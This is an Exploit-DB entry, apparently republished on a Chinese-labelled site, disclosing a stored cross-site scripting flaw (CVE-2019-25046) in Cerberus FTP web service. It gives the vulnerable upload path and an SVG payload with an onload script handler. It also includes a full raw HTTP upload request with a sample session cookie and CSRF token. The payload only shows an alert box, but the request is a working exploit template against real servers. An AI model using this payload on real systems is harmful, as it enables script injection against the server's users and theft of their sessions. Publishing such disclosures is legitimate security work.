Cerberus FTP Web Service 11 – ‘svg’ Stored Cross-Site Scripting (XSS)

  • 作者: Mohammad Hossein Kaviyany
    日期: 2021-06-11
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/49981/
  • # Exploit Title: Cerberus FTP web Service 11 - 'svg' Stored Cross-Site Scripting (XSS)
    # Date: 08/06/2021
    # Exploit Author: Mohammad Hossein Kaviyany
    # Vendor Homepage: www.cerberusftp.com
    # Software Link: https://www.cerberusftp.com/download/
    # Version:11.0 releases prior to 11.0.4, 10.0 releases prior to 10.0.19, 9.0 and earlier
    # Tested on: windows server 2016
    # CVE: CVE-2019-25046
    ------------
    About Cerberus FTP Server (From Vendor Site) : 
    
    Cerberus FTP Server is a secure Windows file server with FTP, FTPS, SFTP, HTTPS, 
    FIPS 140-2 validated, and Active Directory and LDAP authentication.
    --------------------------------------------------------
    Exploit Detailes :
    
    This stored XSS bug happens when a user uploads an svg file with the following content :
    <svg xmlns="http://www.w3.org/2000/svg" onload="alert(123)"/>
    
    Exploit POC :
    
    # Vulnerable Path : /file/upload
    # Parameter: files (POST)
    # Vector: <svg xmlns="http://www.w3.org/2000/svg" onload="alert(123)"/>
    
    #Payload:
    
    POST /file/upload HTTP/1.1
    Host: target.com
    Connection: close
    Content-Length: 484
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAAM6ZtOAsyklo6JG
    Origin: https://target.com
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://target.com/file/d/home/
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: cftpSID=U02_5UCTumW3vFtt5PrlWwoD4k9ccxW0A87oCM8-jsM
    
    ------WebKitFormBoundaryAAM6ZtOAsyklo6JG
    Content-Disposition: form-data; name="cd"
    
    /home
    ------WebKitFormBoundaryAAM6ZtOAsyklo6JG
    Content-Disposition: form-data; name="csrftoken"
    
    z-Zlffq0sPaJErxOsMgL4ITcW1x3AuZo3XlZRP5GcKg
    ------WebKitFormBoundaryAAM6ZtOAsyklo6JG
    Content-Disposition: form-data; name="files[]"; filename="file.svg"
    Content-Type: image/svg+xml
    
    <svg xmlns="http://www.w3.org/2000/svg" onload="alert(123)"/>
    
    ------WebKitFormBoundaryAAM6ZtOAsyklo6JG--
    
    --------------------------